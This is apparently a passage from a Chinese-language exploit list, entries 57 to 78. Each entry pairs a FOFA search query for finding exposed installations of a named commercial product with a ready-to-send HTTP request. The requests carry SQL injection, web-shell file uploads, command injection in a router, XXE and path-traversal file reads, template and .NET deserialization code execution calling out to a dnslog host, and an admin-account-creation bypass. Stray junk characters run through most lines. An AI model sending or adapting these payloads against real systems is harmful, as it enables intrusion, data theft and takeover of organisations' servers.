/ r& A' n8 L) r7 W2 W. Z5 T( z6 P+ W: VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ M a N( J+ z/ z7 _Content-Type: application/json; Q: T; q+ T# R: J& x
6 [) w7 e6 }, P/ S{6 @& L0 c1 z' \( X! E
"storeID":{1 l7 _' E3 x7 _, O
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
9 r% `! O4 i, t; b "MethodName":"Start",
% u" r# H# `# G4 J f, y" p( R "ObjectInstance":{
2 T# A7 _+ x: d9 b/ f ] "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* u. s: o+ g% b- X* A& H
"StartInfo": {$ f7 Y4 K g8 X: W& f4 M
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 ]3 F1 [: ]5 T2 s/ T" k6 C" O
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
* D/ X0 `" v8 F# p+ Y) q9 ^) z# q1 C }
, O+ N" p' S- w; b: V7 J. A }
/ A& M5 `8 P* s( g" B9 Q, C }& ^1 d! u$ F0 d; K3 p' n
}
" o. U3 h- S- D- Z i/ j. t- V9 Z% B! ^7 v0 v3 m2 C
" ~; w1 r& p r& R6 j z9 y% |
57. 畅捷通T+ keyEdit.aspx SQL注入) @/ X( Q; ^- N1 L `! y
FOFA:app="畅捷通-TPlus", O- M4 C( n* I" U. U* p0 H7 L
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1% s4 @3 }% y8 a- g$ D& F* h
Host: host
6 e: G/ A5 J/ o0 j1 I$ tUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
) ^7 S) M0 S s) {: o2 FAccept-Charset: utf-8* a, E k7 f* {9 l1 E. v; z
Accept-Encoding: gzip, deflate
& Q+ U o9 H' X3 R7 t, Q! mConnection: close+ \4 n d: k# a9 P+ o! C U) I
" L3 j9 z2 h/ o* S) l3 N8 Y9 C+ F
! M1 k' R" x/ r8 A4 Z$ w9 z58. 畅捷通T+ KeyInfoList.aspx sql注入
* g% p$ m9 j' b/ B g4 c+ HFOFA:app="畅捷通-TPlus"+ R* Z3 B _7 ^
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1( T0 f5 ^6 R) u
Host: your-ip
' i/ v# b1 @! _/ s# HUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' |1 R+ k. R7 e9 y. r' U8 |Accept-Charset: utf-8
$ K5 B9 Z* P0 mAccept-Encoding: gzip, deflate: A! \9 R: Z, V' u& F
Connection: close
. |; ^4 q3 C5 m. q, N, @/ {. Q9 p% r- r( ^) p: n& N0 Z
% Y; l, P& s: w1 J4 y y7 X. g
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行2 s$ D5 I9 a5 N. O, x! @# p
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
5 _; V" f0 u0 t; }POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.14 [& l3 G: \+ @
Host: 192.168.86.128:9090
6 M8 {/ W0 i! KUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) d$ u! l$ o4 w2 g a( h" a
Connection: close' Q. a. T7 S; k8 ?0 Y. N
Content-Length: 1669
) Z, ]- o% R& g# J( p! l( w" oAccept: */*
5 \5 Q7 a) o3 g) m+ x/ A$ P% mAccept-Language: en$ b! H$ z- Q! \/ M9 W
Content-Type: application/x-www-form-urlencoded3 H4 @5 [5 U- t) k- \
Accept-Encoding: gzip4 F- w- \. m! h2 _) l( Q; P
6 O3 l! f/ \* B9 J n0 u( h
PAYLOAD6 l; l1 W9 k8 `' y9 w* d9 B
" {! L- B7 ^) q6 d9 W" F. H! V- x
60. 百卓Smart管理平台 importexport.php SQL注入
+ e" Y+ t) s4 w( JFOFA:title="Smart管理平台"
- a; v, X0 b/ o) X# ^% j$ \GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1* q5 S* a* F8 R. A0 Q2 O8 A
Host:
9 }/ G/ {5 V1 @1 |$ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 Q }; ~( R$ E# m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 A5 D) o* C7 B& \Accept-Encoding: gzip, deflate' G! Q, M+ k5 Y4 d9 X1 B* b
Accept-Language: zh-CN,zh;q=0.9
- d2 _# U5 }* e( D! vConnection: close( V" t# j$ t7 w6 I/ w! P
( ^% t: H( _3 R& i- P7 ^) g
/ C# d8 K6 E+ f
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, O; e( Y: \/ Q' N$ L F/ lFOFA: title="欢迎使用浙大恩特客户资源管理系统"$ M: v% }0 ~6 j, H- ^/ F* C2 c/ n
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
! I" P' T/ y8 \2 `2 ~+ g aHost: x.x.x.x0 E8 a) H1 h7 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& u; ~& J& X' Z) k
Connection: close& q" ~4 H1 k% J* d5 G8 z& g
Content-Length: 27
% R' l' W3 r) N9 T9 @5 {Accept: */*
& r2 n, x+ E' }$ z% f+ H5 I4 X1 ~. jAccept-Encoding: gzip, deflate
) h0 Y* `4 p) @/ i1 @' U( XAccept-Language: en$ E' h, \) p Q7 |8 y/ O, a- n
Content-Type: application/x-www-form-urlencoded6 X$ g8 B3 K$ r; A9 C
: B& X* h' D: _8 G" N8uxssX66eqrqtKObcVa0kid98xa. c1 l1 D4 I) {; ^) U# b
! a& X. O3 f4 m! Y( ^% u+ V6 @
! g2 n# Y1 V( ]( z62. IP-guard WebServer 远程命令执行
6 s7 \5 e: U) |9 |6 n! w. k3 N1 yFOFA:"IP-guard" && icon_hash="2030860561"! @/ u/ e; n. A5 J1 }
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.11 d" s* R$ p9 v, ]1 |" _8 H& P
Host: x.x.x.x) z, |8 L/ r4 T: S" {/ R" p
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.363 x# b2 f" w0 K
Connection: close, ~6 {) H, p6 s5 m. j
Accept: */*
7 @9 d5 G8 ]/ N1 H* \; f. bAccept-Language: en
' x$ @$ U E W9 T% n& o$ vAccept-Encoding: gzip
; D7 x s; h: A3 N4 R; d5 P/ u+ X1 L! R# w8 |% a6 r: d; I' Q/ U7 u% W
% h% P& c: @& T4 C
访问
p; T& |: {3 S6 x$ r W+ G! r, U/ x/ z! M. U0 Q
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1$ _, D2 z$ G' X: W; ^
Host: x.x.x.x/ [6 |% p6 N5 a! [& S! c% N
5 M8 E6 z8 D% [2 N _
5 C6 l% F" I5 D63. IP-guard WebServer任意文件读取9 @! ]% I; h1 j
IP-guard < 4.82.0609.0
7 |( U" [, h. ?FOFA:icon_hash="2030860561"0 n+ S8 E# }6 ~" G/ F$ H5 \
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
4 c& B) O8 J- K% w6 E1 e* ZHost: your-ip
, L! p0 Z$ Z: ?4 \; Q. JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- P% O- t* L7 n8 r% y4 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: ?7 u5 Y2 W2 l: s; f" PAccept-Encoding: gzip, deflate
/ \8 T* X# @3 D6 KAccept-Language: zh-CN,zh;q=0.92 h- {3 _4 M1 `7 @8 [) \8 ^1 B
Connection: close$ L; \/ u9 T% \! c% t( S4 |9 [5 p
Content-Type: application/x-www-form-urlencoded: W) x: l+ i( q! ~! v
/ [ r5 w* m' v, `
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ g! z; t/ q: M9 h* V- f& V8 Z5 t. z: {6 @; O, q$ X/ U
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
; n9 X: N( h1 l: M/ U( X/ N/ E7 pFOFA:body="/Scripts/EnjoyMsg.js"8 k7 g- r& H2 X6 p" m8 ~1 L
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1+ I! i" r4 Z h
Host: 192.168.86.128:9001
4 ?. {! L/ Y0 r* G; b$ p8 m c% TUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36% U! [+ Y- O& N8 @
Connection: close+ a! X. [; X7 f2 p- I& v6 V3 ]7 O
Content-Length: 3696 m2 i( K' L( E5 |* w0 Q( k& }
Accept: */*7 @( R. B8 y9 U) G4 c4 Z
Accept-Language: en) ]3 R- `5 ^+ o5 O( ?
Content-Type: text/xml; charset=utf-8 k9 S8 `! R5 k9 ~0 D
Accept-Encoding: gzip: a K- f' f* V: Y }: E Y
( |6 k" s& n( S: |7 S% w
<?xml version="1.0" encoding="utf-8"?>
- a' O0 L0 W8 I<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
4 s+ b% a# f" N! H, R4 o<soap:Body>
/ v0 q0 i0 y, Z3 T <GetOSpById xmlns="http://tempuri.org/">- X- O1 U, E6 ^+ F5 ^. r
<sId>1';waitfor delay '0:0:5'--+</sId>
- t' Z- G( U5 I7 D' V </GetOSpById>: a9 _& {! R+ a2 U# x
</soap:Body>! k# O4 Z9 P0 ]. V2 ~
</soap:Envelope>" S% h" l% s2 v/ f3 `' ?
( b0 \3 q8 l; L- m
; a7 q7 q. M' G65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" M" z. ~7 M3 r( T2 `) K6 q7 x" WFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"5 f" {7 m @( [
响应200即成功创建账号test123456/123456
$ ~! }4 N; q+ h3 x( a# m2 FPOST /SystemMng.ashx HTTP/1.1
. U; l. x) U* A5 v! c9 e! ?; f1 pHost:& P) L$ a' P6 Q. J) g
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)5 A* e* s4 m, i# O$ v6 k) n: _
Accept-Encoding: gzip, deflate+ e6 E6 r. N9 z
Accept: */* N0 \ _2 _& e/ ]) J
Connection: close" b8 T- F% W& k8 W
Accept-Language: en0 J- N& H7 L% y: b4 B& q1 F [
Content-Length: 174% M! r+ q/ T5 }0 n; \7 U# Y# G" ]' u5 Y
# _; }! n( s$ h/ `0 I0 ^; p) u
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
; J. ?/ Z# u9 ~9 M3 I0 d7 a- |( D( t
9 O7 K" M* T; V. V9 p& y- e0 q9 u1 ~
% ~+ C; }% T- l' U+ h# K( D66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
" ?+ K2 x' f k( y* N9 eFOFA:app="万户ezOFFICE协同管理平台"
2 i( J: z& \+ [7 V) j5 B" w# F& q) c6 {7 ?0 o2 I# m
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 x7 m* I9 `' a* P, \) p9 I; A
Host: x.x.x.x3 X% x4 h' |6 n1 H/ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36% Q- L5 G* A/ t6 v4 {6 u) K. W4 n
Connection: close
K7 P2 ^% M. b2 RAccept: */*
% J+ r( ?8 C* Q1 R& L) B; PAccept-Language: en0 s5 s1 t! H' z* X O3 n
Accept-Encoding: gzip
- v: K$ T7 i9 q" e2 A7 u* H# m0 d* B' C& g" o
" s. i$ {& ~4 Y- O第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在6 T. X4 @+ x7 ]: u
6 \. }7 f1 w2 W$ b67. 万户ezOFFICE wpsservlet任意文件上传
' q- B5 M% f" L0 E' z, Y# vFOFA:app="万户网络-ezOFFICE"' C) o0 { c) Q: q. {
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
1 X5 {9 T9 v; ^+ i3 J+ f* DPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
' k' J% C: X# X& aHost: x.x.x.x
/ T6 ^; b1 ~8 W" B. EUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.07 z8 {" @; b+ o' ?9 R
Content-Length: 173$ s" j4 l, `" n1 D0 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
/ l# ^. q7 y5 T& Q- ?Accept-Encoding: gzip, deflate% K! p A0 ^7 K
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
$ m5 C1 [' S" ?9 V/ cConnection: close
L6 |( x2 D3 L8 RContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp* }$ `! l" W7 W8 J
DNT: 1$ A8 m; B0 ], r! ~& v* Y
Upgrade-Insecure-Requests: 1
3 _% {0 o5 r( l2 w/ {
. O8 I3 ?% q- j. S* z--ufuadpxathqvxfqnuyuqaozvseiueerp
1 X# u1 K. h) ?* d3 E9 u: MContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"6 l3 b8 B" T `6 W3 j9 A9 t
) a0 {$ ]' y U1 k
<% out.print("sasdfghjkj");%>2 F) S/ O7 X! _
--ufuadpxathqvxfqnuyuqaozvseiueerp--3 Z. k; i7 W' M
/ F" d8 l' w6 x8 E" l! k
5 _1 [' x: k9 n文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
0 u3 V% I/ u9 P, g2 S3 Q4 N/ g6 T; Z* R- p
68. 万户ezOFFICE wf_printnum.jsp SQL注入
# b( y0 G$ @2 a4 y& B: KFOFA:app="万户ezOFFICE协同管理平台"- [) F; |! V* u3 x+ M8 }
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
, i/ E2 f( J2 Y& fHost: {{host}}8 X' e4 |. _- X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36% h6 g) d1 ~7 r. [& U8 c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8! \4 _# C9 B* V/ j& f
Accept-Encoding: gzip, deflate
2 ~9 m7 M/ v6 b* d" d' HAccept-Language: zh-CN,zh;q=0.9+ I- ]6 l" X# Y& A1 ]7 a
Connection: close) ]6 C$ L. G7 G+ h0 K/ g0 e
0 _" n6 p y& ?% o* x% L% ~. Q8 z! b7 X1 h" _+ p; |% e+ X* j
69. 万户 ezOFFICE contract_gd.jsp SQL注入
* Q2 R3 t7 D6 M3 s( Q+ JFOFA:app="万户ezOFFICE协同管理平台"
: z8 [* k1 @) Z7 ^( j9 j, W, r1 lGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
0 g: R$ ?1 ^- y1 {' Y' |; @: UHost: your-ip
4 l1 T3 W$ O7 y* Y* ZUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 V$ R- H5 `! P+ x! T4 bAccept-Encoding: gzip, deflate
2 u, h" Z, `- m4 c, s; ?Accept: */*! Q1 k* {) o+ F% E3 [/ u3 I' {
Connection: keep-alive
4 {. ]' ^0 B. x: T$ j8 R& f- b5 p! P' k
$ s' L' _( D4 l1 w: l. D" R70. 万户ezEIP success 命令执行% I: m: n9 X5 f
FOFA:app="万户网络-ezEIP"
1 X2 v) y* Y, F1 OPOST /member/success.aspx HTTP/1.1
9 c% o* a4 P. wHost: {{Hostname}}% y( z* M+ H. P$ Y8 L( H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
' c' ]% z) z2 f% q6 F& ~SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=$ ?+ S4 M9 \( S. p9 n# F" M
Content-Type: application/x-www-form-urlencoded$ J7 ?4 j) A m. p+ j" p
TYPE: C
0 F! I" k# ^. ~: oContent-Length: 16702
2 J3 U- U$ e/ M& r% m' P" Y$ q
% h5 g @% U2 e/ z) j2 s__VIEWSTATE=PAYLOAD! {" ]/ t% T; U
3 Y% [" S" R+ J8 |* j9 `# T# [7 e0 f2 ?
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# j4 d r4 S1 v- g' yFOFA:body="PM2项目管理系统BS版增强工具.zip"
/ H3 }& P0 z9 K# M* aGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
9 C3 P% _0 a( ?* Q9 L3 w6 KHost: x.x.x.xx.x.x.x
9 X5 x6 O- J- V" CUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. S- w0 h- H& ~
Connection: close
% U( m' N+ V0 |- t% B: nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" H( u: p! G& dAccept-Encoding: gzip, deflate0 Q, f: n. v2 Z: {5 T8 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ {; }( [3 i& L: l' q7 V1 K2 ^Upgrade-Insecure-Requests: 1
- d. b- T& |- g5 P! r. @ M. o% j5 P$ {! x! ^. a
k! C5 e' p5 \( o4 v
72. 致远OA getAjaxDataServlet XXE
% j5 l/ Y& H* ?4 qFOFA:app="致远互联-OA": d, O+ I; E, m# E+ R# R* C$ N% k
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1* q) n" L& ?- h% O4 V! D
Host: 192.168.40.131:8099& i. |8 }5 `, [: i
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
2 f4 |( b3 u8 i3 {5 YConnection: close, m) k/ w. i/ M+ b3 n' o
Content-Length: 583
9 Z3 N0 c7 y7 LContent-Type: application/x-www-form-urlencoded D% ?0 u6 k3 h6 C+ N# C
Accept-Encoding: gzip; g+ a0 u" m! e2 K b
; R: K% r A5 i( V
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
1 c+ S& Y8 Z E2 G2 T
7 o* h( S7 B3 I3 e4 P8 h- X5 H; c$ B
73. GeoServer wms远程代码执行
U$ Q R& E) i! Y: dFOFA:icon_hash=”97540678”4 B; h e1 M6 M7 `. R
POST /geoserver/wms HTTP/1.1
; m. p6 @0 [# l( N; v: mHost:/ e5 ^8 ]- O8 y# j4 L; U1 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- }4 g# w$ w0 Y( k- q
Content-Length: 1981
- J0 B8 M2 C. z" S4 n8 s1 jAccept-Encoding: gzip, deflate
5 l/ h" j6 u5 H2 ~' kConnection: close G9 K! K& h8 a! s+ \2 x0 p: j4 _
Content-Type: application/xml1 K4 a, i* n7 p2 U
SL-CE-SUID: 3! Y/ S3 F5 ?' V/ D m+ v2 U
3 [4 t3 |9 h" D) q9 }
PAYLOAD
# t& t/ ]3 y9 `/ ~/ a0 C& c' x! O
" W# b0 p. u' u2 g
; z( U+ D0 g/ y. n74. 致远M3-server 6_1sp1 反序列化RCE
8 w4 N. v& \7 iFOFA:title="M3-Server"7 M+ U8 ` P$ U+ B0 m' O
PAYLOAD
* I, F) }! u# a' f9 {! W7 W8 o' ^$ G* ]
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
4 H# @) ]6 l) G# zFOFA:app="TELESQUARE-TLR-2005KSH"4 f" r# s5 n3 V' b9 c
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.17 B. ^' M$ S% W9 [6 u
Host: x.x.x.x/ D5 p4 h9 l7 h" Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
U6 y0 p- d5 A5 d) h3 y8 uConnection: close
6 W; e) _6 P. w, W4 H1 m9 ]7 GAccept: */*
& Q( u# I, Q7 g, l3 [. U3 q! Y( L- PAccept-Language: en
5 {6 T K0 ~( e: w3 `& t& T3 EAccept-Encoding: gzip/ m1 E/ h) x6 E4 O+ R4 F$ ?, z
/ _ J. H- K" ?' K7 a1 t5 C6 ^% |8 p3 [
GET /cgi-bin/test28256.txt HTTP/1.1" n1 t# q% `4 n4 H, z
Host: x.x.x.x1 ?5 E, [' p0 n' ^& O
' e( n$ e3 [) u& F( P' |/ q. p
7 z- F8 ?4 v7 ^/ t/ r" q2 u76. 新开普掌上校园服务管理平台service.action远程命令执行, B4 k P' |9 t( ?: W2 ]
FOFA:title="掌上校园服务管理平台"
& P0 Y8 q; p, {, \# p2 C; BPOST /service_transport/service.action HTTP/1.1
" m) O. H" ~8 A5 v+ Y8 f* P7 i' BHost: x.x.x.x
; }3 }/ y g1 ] v6 ~ V# K* EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0: @; i7 |5 ?( I% l. g2 r
Connection: close
7 x4 g3 g( e9 SContent-Length: 211
. z( @" |* W- EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* M/ A, P9 o& k# _2 GAccept-Encoding: gzip, deflate
; {/ Z6 `* Q: }$ DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" G& s0 _/ q3 x2 s8 `8 ?
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4( O, z* {1 a; [
Upgrade-Insecure-Requests: 1
/ X4 B+ @0 t! e% ?
2 Q6 s; v$ v8 Q0 ~# D4 \. ^3 ~% y{
8 h/ x+ f# Z6 P }2 _"command": "GetFZinfo",* h! |* Q+ N/ Q) d- c; j6 D$ A
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
- T/ n4 X8 n- x ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
6 O" e# R) \* h}/ n% U T# \. i- v( k( ~/ Z
8 i) V' d2 ?: w
: A4 s$ M$ q+ _% r
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1* l7 Z1 w' r9 _! r
Host: x.x.x.x4 D7 o4 P! h T! v# a& q2 [+ W
2 m' K" y9 Y" S: C# E2 q8 _- e
' P* L3 u& ~* O1 J( H/ c T2 |* p: I$ {- U3 m$ y* c; S4 K4 U2 G" K* P7 n
77. F22服装管理软件系统UploadHandler.ashx任意文件上传% a7 ]* t7 t) C3 {# B0 b, _. a
FOFA:body="F22WEB登陆"5 J; y# y j0 u0 ~. L2 o# t0 R2 q
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
7 F% n$ U$ a! M6 t' w) o& HHost: x.x.x.x- D! v; [1 D7 w7 ~+ T, d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 y8 N4 c' a8 B9 O
Connection: close% F) Y6 I& o# I
Content-Length: 4333 P( s1 Q4 c! O+ `* E" e
Accept: */*
" O2 @1 t5 N, p" J( t& TAccept-Encoding: gzip, deflate
, ?) J/ V7 M' bAccept-Language: zh-CN,zh;q=0.9
; x1 U" K( ]& E/ i- \/ p5 FContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix' ^( T6 c! I, L5 G0 J
) B1 r& E0 |* [% j; e
------------398jnjVTTlDVXHlE7yYnfwBoix
9 y: z, S& N: U% O0 lContent-Disposition: form-data; name="folder"1 V+ g2 S# `4 {% F! O @
P0 T( }$ p" b! v( _
/upload/udplog6 V' o/ u- N' w
------------398jnjVTTlDVXHlE7yYnfwBoix
: W: }; R6 c$ J6 wContent-Disposition: form-data; name="Filedata"; filename="1.aspx" U- X) n9 U! F! g
Content-Type: application/octet-stream
: A9 H; E* [: c- Y( m$ Q2 T7 y
0 u" c: U6 g. }hello12345679 E% A+ |3 j5 Z) ^
------------398jnjVTTlDVXHlE7yYnfwBoix
1 I/ U& V0 C3 k4 a M+ V) W* GContent-Disposition: form-data; name="Upload"
" G( A' U2 f; C4 W9 I& ~
: C7 q* u! r" b8 i* l% ~' ?& ESubmit Query$ ]) d" r# g9 d P+ A5 f0 U, j( t
------------398jnjVTTlDVXHlE7yYnfwBoix--
]2 e5 ^( {% O+ K
- w L2 N9 Z6 ]) t4 q8 \. x, s; p+ a: v J0 s6 D/ U" [
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传0 Y/ a6 O1 v; K$ K( R" A
FOFA:icon_hash="2001627082"+ L5 {% N3 R- a- [4 `1 I
POST /Platform/System/FileUpload.ashx HTTP/1.19 H# J u- S: Z* H- \6 S
Host: x.x.x.x5 v: w' N! v/ H( @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 y' t- t& u# _; X, l* Z) CConnection: close
- X8 B+ p2 Y* j3 n' _Content-Length: 336, @" b$ b5 b% \# k X
Accept-Encoding: gzip
! H- c2 ?4 u+ QContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
; [3 H) E8 K( O( m( ?0 S% F* @ U! b: X3 ~5 G$ O
------YsOxWxSvj1KyZow1PTsh98fdu6l
( v1 B0 L0 Q, H# H& j: J+ ~4 KContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"" X3 R |- ~- y+ i
Content-Type: image/png: ^5 c- b( i) }' i
2 y3 j0 U+ S' y% R* E ^
YsOxWxSvj1KyZow1PTsh98fdu6l
: Y/ m7 R$ S/ Q5 n) G+ U' z+ }------YsOxWxSvj1KyZow1PTsh98fdu6l
8 V) s/ G+ D+ ]" O OContent-Disposition: form-data; name="target"
% _ x+ W$ Q$ M1 P( M6 K) Z3 M/ B; K. v8 B' G$ I
